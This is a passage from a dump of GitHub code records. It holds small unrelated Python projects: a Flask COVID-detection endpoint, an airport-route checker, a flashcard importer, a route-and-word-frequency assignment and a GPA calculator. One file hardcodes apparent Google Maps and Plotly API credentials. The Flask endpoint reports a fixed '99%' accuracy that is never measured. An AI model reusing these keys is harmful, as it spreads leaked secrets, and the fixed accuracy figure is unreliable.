+ \" to \" + out_dir)\n i = (i + 1) % stride","repo_name":"betandr/river","sub_path":"sample_files.py","file_name":"sample_files.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"} +{"seq_id":"19758783980","text":"from flask import Flask, request, jsonify\nfrom PIL import Image\nimport pytesseract\nimport numpy as 
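# A self-contained sketch of the decode-and-parse step that get_code() above relies
# on (the sample HTML is invented): Gmail returns message bodies as URL-safe base64,
# which is decoded and then searched with BeautifulSoup.
import base64
from bs4 import BeautifulSoup

sample_html = b"<html><body><font size='6'>123456</font></body></html>"
body_data = base64.urlsafe_b64encode(sample_html)   # shaped like the API's 'data' field
soup = BeautifulSoup(base64.urlsafe_b64decode(body_data), features='html.parser')
print(soup.find('font').contents[0])                # -> 123456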
np\nimport tensorflow as tf\nfrom keras.applications.vgg19 import VGG19\nfrom keras.layers import Dense, Flatten\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\n\n\n\n\ndef pred(image1):\n    weights1 = np.load('round-3-weights.npz')\n    # # Construct the model architecture\n    # model = tf.keras.Sequential([\n    #     tf.keras.layers.Dense(64, activation='relu', input_shape=(784,)),\n    #     tf.keras.layers.Dense(10, activation='softmax')\n    # ])\n\n    # # Compile the model\n    # model.compile(optimizer='adam',\n    #               loss='sparse_categorical_crossentropy',\n    #               metrics=['accuracy'])\n    \n    # Load and compile Keras model\n    vgg = VGG19(weights=None, include_top=False, input_shape=(112, 112, 3))  # build untrained; the npz weights are applied via set_weights below\n    # Freeze first 10 layers\n    for layer in vgg.layers[:10]:\n        layer.trainable = False\n    x = vgg.output\n    x = Flatten()(x)\n    x = Dense(128, activation='relu')(x)\n    x = Dense(256, activation='relu')(x)\n    predictions = Dense(2, activation='softmax')(x)  # change number of classes to 2 for covid and normal\n    model = Model(inputs=vgg.input, outputs=predictions)\n    model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n\n\n\n\n    \n    # Set the model weights\n    model.set_weights([weights1[name] for name in weights1])\n    # Make a prediction on new input data\n    # x_test = np.random.randn(100, 784)\n    # y_pred = model.predict(x_test)\n\n    x_test = preprocess_image(image1)\n\n    # Call the predict function with the preprocessed image\n    y_pred = model.predict(x_test)\n\n    return y_pred\n\n\ndef preprocess_image(image_path):\n    # Load the image and force 3 RGB channels (the VGG19 input expects them)\n    img = Image.open(image_path).convert('RGB')\n\n    # Resize the image to (112, 112)\n    img = img.resize((112, 112))\n\n    # Convert the image to a numpy array\n    img_array = np.array(img)\n\n    # Add an extra dimension to the image array for batching\n    img_array = np.expand_dims(img_array, axis=0)\n\n    # Normalize the image array\n    img_array = img_array.astype('float32') / 255.0\n\n    return img_array\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\napp = Flask(__name__)\n\n# Set Tesseract path for OCR\npytesseract.pytesseract.tesseract_cmd = '/usr/bin/tesseract'\n\n@app.route('/api/extract_text', methods=['POST'])\ndef extract_text():\n    # Check if image file is present in the request\n    if 'image' not in request.files:\n        return jsonify({'error': 'no image found in request'}), 400\n\n    # Read image file and convert to grayscale\n    image_file = request.files['image']\n    image = Image.open(image_file).convert('L')\n\n    # Extract text from image using pytesseract\n    # text = pytesseract.image_to_string(image)\n\n    image_file.seek(0)  # rewind the upload; Image.open above already consumed the stream\n    x=pred(image_file)\n    result=\"positive\"\n    accuracy=\"99%\"\n    # Return prediction as response (tolist makes the numpy array JSON serializable)\n    return jsonify({'result': x.tolist(),\n                    'accuracy':accuracy})\n\nif __name__ == '__main__':\n    app.run(debug=True)\n\n\n#commandline http request\n#curl -X POST -F \"image=@ocr_test.png\" http://localhost:5000/api/extract_text\n\n","repo_name":"Vaibhav13kamat/Covid-detection-FL","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34484594546","text":"# luiz.augusto.farias@ccc.ufcg.edu.br\n\ndef meu_in(lista, elemento):\n    for i in range(len(lista)):\n        if lista[i] == elemento:\n            return True\n    return False\n\ndef eh_roteiro(iata, voos, cidades):\n    lista = cidades.split(\"/\")\n    \n    for i in range(len(lista) - 1):\n        if meu_in(voos[iata[lista[i]]], iata[lista[i + 1]]) == False:\n            return False\n    return True\n\niata = {\"Campina Grande\": \"CPV\",\n    
\"Recife\": \"REC\",\n \"Salvador\": \"SSA\",\n \"Brasilia\": \"BSB\",\n \"Sao Paulo\": \"GRU\",\n \"Rio de Janeiro\": \"GIG\"}\n\n\nvoos = {\"CPV\": [\"REC\", \"SSA\"],\n \"REC\": [\"CPV\", \"BSB\", \"GRU\", \"GIG\"],\n \"SSA\": [\"REC\", \"GRU\", \"GIG\"],\n \"BSB\": [\"CPV\", \"GIG\", \"GRU\"],\n \"GRU\": [\"GIG\", \"BSB\"],\n \"GIG\": [\"GRU\", \"REC\"]}\n\nassert eh_roteiro(iata, voos, \"Campina Grande/Recife/Rio de Janeiro\")\nassert eh_roteiro(iata, voos, \"Sao Paulo/Rio de Janeiro/Recife/Brasilia\")\nassert not eh_roteiro(iata, voos, \"Recife/Rio de Janeiro/Salvador/Recife\")","repo_name":"luizaugustoliveira/Algoritmos","sub_path":"Dicionários/roteiros_aeroportos/aeroportos.py","file_name":"aeroportos.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1333994817","text":"from cnx_flip.models import *\nfrom .db import *\nimport transaction\nimport urllib2\nimport json\nimport xml.etree.ElementTree as ET\n\n\n\ndef test_db():\n mockCardsInTestDeck1 = {'deck_name': 'test_deck1',\n 'cards': [Card(term='term1', definition='def1'), \\\n Card(term='term2', definition='def2'), \\\n Card(term='term3', definition='def3'), \\\n Card(term='term4', definition='def4'), \\\n Card(term='term5', definition='def5'), \\\n Card(term='term6', definition='def6'), \\\n Card(term='term7', definition='def7')]}\n mockCardsInTestDeck2 = {'deck_name': 'test_deck2',\n 'cards':[Card(term='TERM1', definition='DEF1'), \\\n Card(term='TERM2', definition='DEF2'), \\\n Card(term='TERM3', definition='DEF3'), \\\n Card(term='TERM4', definition='DEF4'), \\\n Card(term='TERM5', definition='DEF5'), \\\n Card(term='TERM6', definition='DEF6'), \\\n Card(term='TERM7', definition='DEF7')]}\n mockCardsInTestDeck3 = {'deck_name': 'test_deck3',\n 'cards':[Card(term='haha1', definition='DEFINITION1'), \\\n Card(term='haha2', definition='DEFINITION2'), \\\n Card(term='haha3', definition='DEFINITION3'), \\\n Card(term='haha4', definition='DEFINITION4'), \\\n Card(term='haha5', definition='DEFINITION5'), \\\n Card(term='haha6', definition='DEFINITION6'), \\\n Card(term='haha7', definition='DEFINITION7')]}\n mockdecks = [mockCardsInTestDeck1, mockCardsInTestDeck2, mockCardsInTestDeck3]\n user_name = 'admin'\n \n with transaction.manager:\n\n for deck in mockdecks:\n # add cards\n deck_tmp = DBSession.query(Deck).filter(Deck.title==deck['deck_name'])\n if deck_tmp.count() == 0:\n deck_tmp = Deck(title=deck['deck_name'], color='green')\n else:\n deck_tmp = deck_tmp.first()\n deck_tmp.cards = deck['cards'] #If do not want to override cards\\\n # have to use deck_tmp + deck['cards']\n # link to the admin user\n admin = DBSession.query(User).filter(User.user_name==user_name)\n if admin.count == 0:\n admin = User(user_name=user_name)\n else:\n admin = admin.first()\n admin.decks.append(deck_tmp)\n\ndef importCardsFromCnxDb(uuid, deckid, cnxdbHost):\n # Build the request.\n # http://localhost:6543/xpath?id=e79ffde3-7fb4-4af3-9ec8-df648b391597&q=//*[local-name()=%22meaning%22]\n request_headers = {\n \"Accept\" : \"application/json\"\n # \"Authorization\" : \"Bearer 6879-1aVn-THALZjt82mlGqFRZZKMDV4Db1pGy0iO5xjUbeo\"\n }\n request_url = cnxdbHost + \"/xpath?id=\" + uuid + \"&q=//*[local-name()=%22definition%22]\"\n request = urllib2.Request(request_url, headers=request_headers)\n response = urllib2.urlopen(request).read()\n response = json.loads(response)\n \n # Error handling\n for module in response['results']:\n for term_def_wrap in 
module['xpath_results']:\n tree = ET.fromstring(term_def_wrap.encode('utf-8'))\n if len(tree) < 2 or tree[1].text == None or tree[0].text == None:\n continue\n\n term = tree[0].text.encode('utf-8')\n definition = tree[1].text.encode('utf-8')\n with transaction.manager:\n deck_tmp = DBSession.query(Deck).filter(Deck.id==deckid).first()\n card_tmp = Card(term=term, definition=definition, deck_id=deckid)\n deck_tmp.cards.append(card_tmp)\n\n# if __name__ == \"__main__\":\n# importCardsFromCnxDb(\"e79ffde3-7fb4-4af3-9ec8-df648b391597\", 1, \"http://localhost:6543\")\n # 5152cea8-829a-4aaf-bcc5-c58a416ecb66\n # importCardsFromCnxDb(\"5152cea8-829a-4aaf-bcc5-c58a416ecb66\", 1, \"http://localhost:6543\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"timm-lan/CNX_Flip","sub_path":"cnx_flip/importFromCnxDb.py","file_name":"importFromCnxDb.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"1185614363","text":"from gmplot import *\nfrom number2 import ADistance\nfrom Graph import Graph\nfrom geopy.geocoders import Nominatim\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport pandas as pd\nimport RabinKarp\nimport webbrowser\nimport time\n\nstart = time.time()\n\nd = ADistance()\nlocations = ['Kuala Lumpur', 'Dhaka', 'Jakarta', 'Bandar Seri Begawan', 'Manila', 'Shanghai', 'Tokyo']\n\ncoord = []\nfor j in range(len(locations)):\n coord.append(d.get_coord_in_list(locations[j]))\n\ndf = pd.DataFrame(coord, columns=['x-cord', 'y-cord'], index=locations)\nprint(df)\nprint()\n\n# get latitude and longitude points of different cities\nlats, lons = zip(*coord)\n\n# declare center of the map\ngmap2 = gmplot.GoogleMapPlotter(3.1516636, 101.6943028, 6)\n\n# Scatter map\ngmap2.scatter(lats, lons, '#FF0000', size=50000, marker=False)\n\n# Plot method Draw a line in between given coordinates\n# Jakarta(-6.1753942, 106.827183)\n# Dhaka(23.7593572, 90.3788136)\n# Manila(14.5906216, 120.9799696)\n# Bandar Seri Begawan(4.8895453, 114.9417574)\n# Shanghai(31.2252985, 121.4890497)\n# Kuala Lumpur(3.1516636, 101.6943028)\n# Tokyo(35.6828387, 139.7594549)\ngmap2.plot([3.1516636, 23.7593572, 35.6828387, 14.5906216, 4.8895453, -6.1753942, 3.1516636, 4.8895453],\n [101.6943028, 90.3788136, 139.7594549, 120.9799696, 114.9417574, 106.827183, 101.6943028, 114.9417574],\n 'cornflowerblue', edge_width=2.0)\ngmap2.plot([23.7593572, 31.2252985, 35.6828387], [90.3788136, 121.4890497, 139.7594549],\n 'cornflowerblue', edge_width=2.0)\ngmap2.plot([31.2252985, 14.5906216], [121.4890497, 120.9799696], 'cornflowerblue', edge_width=2.0)\ngmap2.plot([23.7593572, 4.8895453], [90.3788136, 114.9417574], 'cornflowerblue', edge_width=2.0)\n\ngmap2.apikey = \"AIzaSyDeRNMnZ__VnQDiATiuz4kPjF_c9r1kWe8\"\n\n# draw map into html\ngmap2.draw(\"maps/graph_before.html\")\nurl = r\"maps\\graph_before.html\"\nwebbrowser.open(url, new=2)\n\ngeolocator = Nominatim(user_agent='WIA2005_Assignment')\n\nfor current in range(len(locations)):\n for other in range(len(locations)):\n if current is not other:\n print(locations[current], '<->', locations[other])\n distance = d.distance(locations[current], locations[other])\n print('Distance: ' + str(distance) + 'km')\n print('\\n')\n\n\ngraph = Graph([\n (\"Kuala Lumpur\", \"Dhaka\", 2584.787), (\"Kuala Lumpur\", \"Jakarta\", 1178.665),\n (\"Kuala Lumpur\", \"Bandar Seri Begawan\", 1483.521), (\"Jakarta\", \"Bandar Seri Begawan\", 1519.996),\n (\"Dhaka\", \"Bandar Seri Begawan\", 3361.34), 
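# A minimal sketch of the ElementTree step used in importCardsFromCnxDb() above
# (the XML sample is invented): each xpath result is parsed and its first two
# children are read as the card's term and definition.
import xml.etree.ElementTree as ET

xml = '<definition><term>osmosis</term><meaning>diffusion of water across a membrane</meaning></definition>'
tree = ET.fromstring(xml)
if len(tree) >= 2 and tree[0].text and tree[1].text:
    print(tree[0].text, '->', tree[1].text)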
(\"Dhaka\", \"Shanghai\", 3171.866), (\"Dhaka\", \"Tokyo\", 4903.439),\n (\"Bandar Seri Begawan\", \"Manila\", 1260.663), (\"Manila\", \"Shanghai\", 1842.992), (\"Manila\", \"Tokyo\", 2995.407),\n (\"Shanghai\", \"Tokyo\", 1766.048)])\n\n# starting_point = input(\"From: \")\n# end_point = input(\"To: \")\n# shortest_route = list(graph.dijkstra(starting_point, end_point))\n# print(\"Shortest route from\", starting_point, \"to\", end_point)\n\nshortest_route = list(graph.dijkstra(\"Dhaka\", \"Manila\"))\n\nprint(\"Shortest route from Kuala Lumpur to Tokyo:\")\nfor i in shortest_route:\n if i is shortest_route[-1]:\n print(i, '\\n')\n else:\n print(i, \"--> \", end=\"\")\n\n\n##############################\n# Plot map for shortest path #\n##############################\ngmap3 = gmplot.GoogleMapPlotter(3.1516636, 101.6943028, 6)\n\nfor i in range(len(shortest_route) - 1):\n gmap3.plot([d.get_lat(shortest_route[i]), d.get_lat(shortest_route[i + 1])], [d.get_lon(shortest_route[i]),\n d.get_lon(shortest_route[i + 1])],\n 'cornflowerblue', edge_width=2.0)\n\ngmap3.apikey = \"AIzaSyDeRNMnZ__VnQDiATiuz4kPjF_c9r1kWe8\"\ngmap3.draw(\"maps/graph_after.html\")\n\nurl = r\"maps\\graph_after.html\"\nwebbrowser.open(url, new=2)\n\n# initializing stop words\nstopwords = ['a', 'about', 'above', 'after', 'again', 'against', 'all', 'am', 'an', 'and',\n 'any', 'are', \"aren't\", 'as', 'at', 'be', 'because', 'been', 'before', 'being',\n 'below', 'between', 'both', 'but', 'by', \"can't\", 'cannot', 'could', \"couldn't\", 'did',\n \"didn't\", 'do', 'does', \"doesn't\", 'doing', \"don't\", 'down', 'during', 'each', 'few',\n 'for', 'from', 'further', 'had', \"hadn't\", 'has', \"hasn't\", 'have', \"haven't\", 'having',\n 'he', \"he'd\", \"he'll\", \"he's\", 'her', 'here', \"here's\", 'hers', 'herself', 'him',\n 'himself', 'his', 'how', \"how's\", 'i', \"i'd\", \"i'll\", \"i'm\", \"i've\", 'if', 'in', 'into',\n 'is', \"isn't\", 'it', \"it's\", 'its', 'itself', \"let's\", 'me', 'more', 'most', \"mustn't\",\n 'my', 'myself', 'no', 'nor', 'not', 'of', 'off', 'on', 'once', 'only', 'or', 'other',\n 'ought', 'our', 'ours', 'ourselves', 'out', 'over', 'own', 'same', \"shan't\", 'she', \"she'd\",\n \"she'll\", \"she's\", 'should', \"shouldn't\", 'so', 'some', 'such', 'than', 'that', \"that's\",\n 'the', 'their', 'theirs', 'them', 'themselves', 'then', 'there', \"there's\", 'these', 'they',\n \"they'd\", \"they'll\", \"they're\", \"they've\", 'this', 'those', 'through', 'to', 'too', 'under',\n 'until', 'up', 'very', 'was', \"wasn't\", 'we', \"we'd\", \"we'll\", \"we're\", \"we've\", 'were', \"weren't\",\n 'what', \"what's\", 'when', \"when's\", 'where', \"where's\", 'which', 'while', 'who', \"who's\", 'whom', 'why',\n \"why's\", 'with', \"won't\", 'would', \"wouldn't\", 'you', \"you'd\", \"you'll\", \"you're\", \"you've\",\n 'your', 'yours', 'yourself', 'yourselves']\n\nklIO = open('news/text/Kuala Lumpur.txt', 'r', encoding='utf-8-sig')\nkl_text = klIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\nklIO.close()\n\njakartaIO = open('news/text/Jakarta.txt', 'r', encoding='utf-8-sig')\njakarta_text = jakartaIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\njakartaIO.close()\n\nmanilaIO = open('news/text/Manila.txt', 'r', encoding='utf-8-sig')\nmanila_text = manilaIO.read().lower()\nkl_text = kl_text.replace(\"\\n\", \" \")\nmanilaIO.close()\n\ndhakaIO = open('news/text/Dhaka.txt', 'r', encoding='utf-8-sig')\ndhaka_text = dhakaIO.read().lower()\ndhaka_text = dhaka_text.replace(\"\\n\", \" 
\")\ndhakaIO.close()\n\nbandar_seri_begawanIO = open('news/text/Bandar Seri Begawan.txt', 'r', encoding='utf-8-sig')\nbandar_seri_begawan_text = bandar_seri_begawanIO.read().lower()\nbandar_seri_begawan_text = bandar_seri_begawan_text.replace(\"\\n\", \" \")\nbandar_seri_begawanIO.close()\n\nshanghaiIO = open('news/text/Shanghai.txt', 'r', encoding='utf-8-sig')\nshanghai_text = shanghaiIO.read().lower()\nshanghai_text = shanghai_text.replace(\"\\n\", \" \")\nshanghaiIO.close()\n\ntokyoIO = open('news/text/Tokyo.txt', 'r', encoding='utf-8-sig')\ntokyo_text = tokyoIO.read().lower()\ntokyo_text = tokyo_text.replace(\"\\n\", \" \")\ntokyoIO.close()\n\n\n# get frequency of words in a text\ndef frequency(text, city):\n list_of_words = text.split()\n freq = {}\n for word in list_of_words:\n freq[word] = freq.get(word, 0) + 1\n keys = freq.keys()\n\n print(\"Frequencies of word for \" + city + \"'s article:\\n\\n\" + str(freq) + \"\\n\")\n\n\n# print frequency of each word in text for every cities' article\nfrequency(kl_text, 'Kuala Lumpur')\nfrequency(dhaka_text, 'Dhaka')\nfrequency(jakarta_text, 'Jakarta')\nfrequency(bandar_seri_begawan_text, 'Bandar Seri Begawan')\nfrequency(manila_text, 'Manila')\nfrequency(shanghai_text, 'Shanghai')\nfrequency(tokyo_text, 'Tokyo')\n\n\ndef word_count(text):\n stop_count = 0\n list_of_words = text.split()\n for word in stopwords:\n if RabinKarp.rabin_karp_matcher(word, text):\n stop_count = stop_count + 1\n # delete stop words\n text = text.lower().replace(word, \"\", 1)\n return stop_count, len(list_of_words)\n\n\nkl_stop_count, kl_total_words = word_count(kl_text)\ndhaka_stop_count, dhaka_total_words = word_count(dhaka_text)\njakarta_stop_count, jakarta_total_words = word_count(jakarta_text)\nbsb_stop_count, bsb_total_words = word_count(bandar_seri_begawan_text)\nmanila_stop_count, manila_total_words = word_count(manila_text)\nshanghai_stop_count, shanghai_total_words = word_count(shanghai_text)\ntokyo_stop_count, tokyo_total_words = word_count(tokyo_text)\n\n# Histogram\npy.sign_in(username='DanialHarith', api_key='NyqKPpTtwYfr4nyZwcYP')\n\nx = [\"Kuala Lumpur\", \"Dhaka\", \"Jakarta\", \"Bandar Seri Begawan\", \"Manila\", \"Shanghai\", \"Tokyo\"]\nstop_counts = [kl_stop_count, dhaka_stop_count, jakarta_stop_count, bsb_stop_count,\n manila_stop_count, shanghai_stop_count, tokyo_stop_count]\ntotal_words = [kl_total_words, dhaka_total_words, jakarta_total_words, bsb_total_words,\n manila_total_words, shanghai_total_words, tokyo_total_words]\n\ndata = [\n go.Histogram(\n histfunc=\"sum\",\n y=stop_counts,\n x=x,\n name=\"Stop words\"\n ),\n go.Histogram(\n histfunc=\"sum\",\n y=total_words,\n x=x,\n name=\"Total words\"\n )\n]\nlayout = go.Layout(\n title=go.layout.Title(\n text=\"Stop Words & Total Words\",\n xref='paper',\n x=0\n )\n)\nfig = go.Figure(data=data, layout=layout)\npy.plot(fig, filename='Stop Words Count')\n\n########################################################################\n# Get the total distribution taken of random routes taken for end user #\n########################################################################\na = d.distance(\"Kuala Lumpur\", \"Manila\")\n\nb = d.distance(\"Kuala Lumpur\", \"Jakarta\")\n\nc = d.distance(\"Kuala Lumpur\", \"Dhaka\")\n\nTotalDist = a + b + c\n\ndistKL_to_Manila = a / TotalDist\n\ndistKL_to_Jakarta = b / TotalDist\n\ndistKL_to_Dhaka = c / TotalDist\n\nprint(\"\\nProbability Distribution for KL to Manila = \", distKL_to_Manila,\n \"\\nProbability Distribution for KL to Jakarta = \", 
distKL_to_Jakarta,\n \"\\nProbability Distribution for KL to Dhaka = \", distKL_to_Dhaka,)\n\n\nend = time.time() - start\nprint(\"\\nTotal running time:\", end, \"s\")\n","repo_name":"DanialAroff/ALGO-Project","sub_path":"FINAL1.py","file_name":"FINAL1.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"22118247598","text":"class Calculator:\n\n def __init__(self, dataInterface, dataWrapper):\n self.dataInterface = dataInterface\n self.dataWrapper = dataWrapper\n\n\n def calculateCumulativeGpa(self, undergrad):\n score = 0\n units = 0\n for term in undergrad.pastTerms:\n score += self.countTermScore(term)\n units += self.countTermUnits(term, True)\n\n return score / units\n\n\n def calculateTermGpa(self, term):\n score = self.countTermScore(term)\n units = self.countTermUnits(term, True)\n\n return score / units\n\n\n def countTermScore(self, term):\n scoreCount = 0\n for course in term.courses:\n try:\n scoreCount += course.units * self.dataWrapper.getValueFromLetterGrade(course.letterGrade)\n except TypeError:\n continue\n\n return scoreCount\n\n\n def countTermUnits(self, term, gradedOnly=False):\n unitCount = 0\n for course in term.courses:\n if course.letterGrade == 'LW' or (gradedOnly and course.letterGrade == 'P'):\n continue\n\n unitCount += course.units\n\n return unitCount\n","repo_name":"joshtgill/lej","sub_path":"src/academics/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37774327357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 8 13:42:13 2021\r\n\r\n@author: ja\r\n\"\"\"\r\n\r\ns = input(\"Write a word:\")\r\n\r\nx = 0\r\nn = 0\r\n\r\nfor i in range(len(s)-2):\r\n if s[i] == 'b':\r\n if s[i+1] == 'o':\r\n if s[i+2] == 'b':\r\n x += 1\r\n n += 1\r\n \r\nprint (\"Number of times bob occurs is:\", x)","repo_name":"Krystep/MITx-6.00.1x","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17883256742","text":"from time import time\nfrom os.path import curdir\nfrom clones.validation.arguments import RunArguments\nfrom clones.validation.batch import BatchBenchmark\n\n\n# ======================== PARSE SCRIPT ARGUMENTS =============================\n\nargs = RunArguments(description='Batch benchmark arguments.')\njob_path = args['path']\ntrain = args['train_globally']\n\n# ============================= RUN SCRIPT ====================================\n\nstart_time = time()\n\n\n# run each simulation in job file\nwith open(job_path, 'r') as job_file:\n\n # run each simulation\n for path in job_file.readlines():\n\n path = path.strip()\n\n # load benchmark\n benchmark = BatchBenchmark.load(path)\n benchmark.batch.root = curdir\n\n # evaluate benchmark\n benchmark.run(train=train)\n\n # save benchmark\n benchmark.save(path)\n\n# print runtime to standard out\nruntime = time() - start_time\nprint('BATCH COMPLETED IN {:0.2f}.\\n'.format(runtime))\n","repo_name":"sbernasek/flyqma","sub_path":"flyqma/scripts/run_batch.py","file_name":"run_batch.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"33717793794","text":"import sys\r\ndef leap_year(x):\r\n if (x%4) == 0 and (x%100) != 0 or 
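# FINAL1.py imports a RabinKarp module that is not included in this dump; a minimal
# rolling-hash matcher with the same (pattern, text) -> bool call shape could look
# like this sketch (base and modulus are arbitrary choices):
def rabin_karp_matcher(pattern, text, base=256, mod=101):
    m, n = len(pattern), len(text)
    if m == 0 or m > n:
        return m == 0
    h = pow(base, m - 1, mod)                  # weight of the window's leading char
    p_hash = t_hash = 0
    for i in range(m):                         # hashes of pattern and first window
        p_hash = (base * p_hash + ord(pattern[i])) % mod
        t_hash = (base * t_hash + ord(text[i])) % mod
    for s in range(n - m + 1):
        if p_hash == t_hash and text[s:s + m] == pattern:
            return True                        # verified match, no false positive
        if s < n - m:                          # roll the window one char right
            t_hash = (base * (t_hash - ord(text[s]) * h) + ord(text[s + m])) % mod
    return False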
(x%400) == 0 :\r\n        print('1')\r\n    else :\r\n        print('0')\r\n\r\na = int(sys.stdin.readline())\r\nleap_year(a)\r\n# do we need parentheses when grouping with or?","repo_name":"jjin93/Pyton_algorithm","sub_path":"week01/진승현/코드 리뷰용/2753.py","file_name":"2753.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"127965603","text":"import bisect\n\nL, Q = list(map(int, input().split()))\narr = [0, L]\nfor q in range(Q):\n    c, x = list(map(int, input().split()))\n    if c == 1:\n        #bisect.insort_left(arr, x)\n        ind = bisect.bisect_left(arr, x)\n        arr.insert(ind, x)\n    else:\n        index = bisect.bisect_left(arr, x)\n        diff = arr[index]-arr[index-1]\n        print(diff)\n\n\n\n","repo_name":"tinaba96/coding","sub_path":"acode/abc217/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72243172443","text":"from product.serializers import (\n    ProductSerializer,\n    PriceSerializer,\n)\n\nfrom product.models import (\n    Product as ProductModel,\n    Price as PriceModel,\n)\n\n\n\ndef get_product(product_id):\n    \"\"\"Return product info.\n\n    Args:\n        product_id (int): product id\n\n    Returns:\n        product_info (dict): product info\n    \"\"\"\n\n    product_obj = ProductModel.objects.get(id=product_id)\n\n    product_info = ProductSerializer(product_obj).data\n\n    return product_info\n\n\ndef create_product(product_info):\n    \"\"\"Create a product from product info.\n\n    Args:\n        product_info (dict): product info to create\n\n    Returns:\n        product_obj (ProductModel) : created product object\n\n\n    \"\"\"\n\n    product_serializer = ProductSerializer(data=product_info)\n    product_serializer.is_valid(raise_exception=True)\n    product_obj = product_serializer.save()\n\n    return product_obj\n\n\ndef update_product(product_id, update_info):\n    \"\"\"Update product info.\n    \n    Args:\n        product_id (int): PK of the product to update\n        update_info (dict): update info\n\n    Returns:\n        product_obj (ProductModel): updated product object\n\n    Raises:\n        \n    \"\"\"\n    product_obj = ProductModel.objects.get(id=product_id)\n\n    product_serializer = ProductSerializer(product_obj, data=update_info, partial=True)\n    product_serializer.is_valid(raise_exception=True)\n    product_obj = product_serializer.save()\n\n    return product_obj\n\n\ndef delete_product(product_id):\n    \"\"\"Delete a product.\n\n    Args:\n        product_id (int): PK of the product to delete\n\n    Returns:\n        \n    \n    \"\"\"\n\n    product_obj = ProductModel.objects.get(id=product_id)\n    product_obj.delete()\n\n\ndef get_price_list(product_id):\n    \"\"\" Return the list of price info for a product.\n\n    Args:\n        product_id (int): product PK\n\n    Returns:\n        price_info_list (list): list of price info\n    \"\"\"\n\n    product_obj = ProductModel.objects.get(id=product_id)\n\n    price_obj_list = PriceModel.objects.filter(product=product_obj)\n    \n    price_info_list = PriceSerializer(price_obj_list, many=True).data\n\n    return price_info_list\n\n\ndef create_price(product_id, price_info):\n    \"\"\"Create a price for a product.\n\n    Args:\n        product_id (int): product PK\n        price_info (dict): price info\n\n    Returns:\n        price_obj (PriceModel): created price object\n    \"\"\"\n\n    price_info['product'] = product_id\n    price_serializer = PriceSerializer(data=price_info)\n    price_serializer.is_valid(raise_exception=True)\n    price_obj = price_serializer.save()\n\n    return price_obj\n\n\ndef update_price(price_id, update_info):\n    \"\"\"Update price info.\n    \n    Args:\n        price_id (int): PK of the price to update\n        update_info (dict): update info\n\n    Returns:\n        price (PriceModel): updated price object\n\n    Raises:\n        \n    \"\"\"\n    price_obj = PriceModel.objects.get(id=price_id)\n\n    price_serializer = 
PriceSerializer(price_obj, data=update_info, partial=True)\n    price_serializer.is_valid(raise_exception=True)\n    price_obj = price_serializer.save()\n\n    return price_obj \n\n\ndef delete_price(price_id):\n    \"\"\"Delete a price.\n\n    Args:\n        price_id (int): PK of the price to delete\n\n    Returns:\n        \n    \n    \"\"\"\n\n    price_obj = PriceModel.objects.get(id=price_id)\n    price_obj.delete()\n","repo_name":"kimphysicsman/fruites_store_service","sub_path":"product/servieces/product_service.py","file_name":"product_service.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27939568993","text":"import cv2\nimport matplotlib.pyplot as plt\nfrom skimage import exposure\n\nimg = cv2.imread(\"../Images/carro.jpg\", 0)\n\n# Original histogram\nplt.figure()\nplt.title(\"Hist original\")\nplt.hist(img.ravel(), 256, [0, 256])\n\n# Display the original image\nplt.figure()\nplt.title(\"Figura original\")\nplt.imshow(img, \"gray\")\nprint(f\"Shape da img original: {img.shape}\")\n\n# Value 'gain = 1.9'\nimg_adjust = exposure.adjust_log(img, 1.9)\n# Display the adjusted image\nplt.figure()\nplt.title(\"Imagem Ajustada com skimage\")\nplt.imshow(img_adjust, \"gray\")\n\nplt.figure()\nplt.hist(img_adjust.ravel(), 256, [0, 256])\nplt.title(\"Histograma da Imagem Ajustada com skimage\")\n\n# Create a mask\n# for l in range(0, 95):\n#     for c in range(10, 30):\n#         pto = (c, l)\n#         img_ex1[pto] = 100\n\nplt.show()\n","repo_name":"brunosilva5/PDI-UTAD","sub_path":"Folha de Exercicios/MiniTeste1/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26169460225","text":"from django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom core.models import CategoryCampaing\n\n\nclass Command(BaseCommand):\n    help = 'create categories'\n\n    def success(self, message):\n        return self.stdout.write(\n            self.style.SUCCESS(message)\n        )\n\n    def warning(self, warning):\n        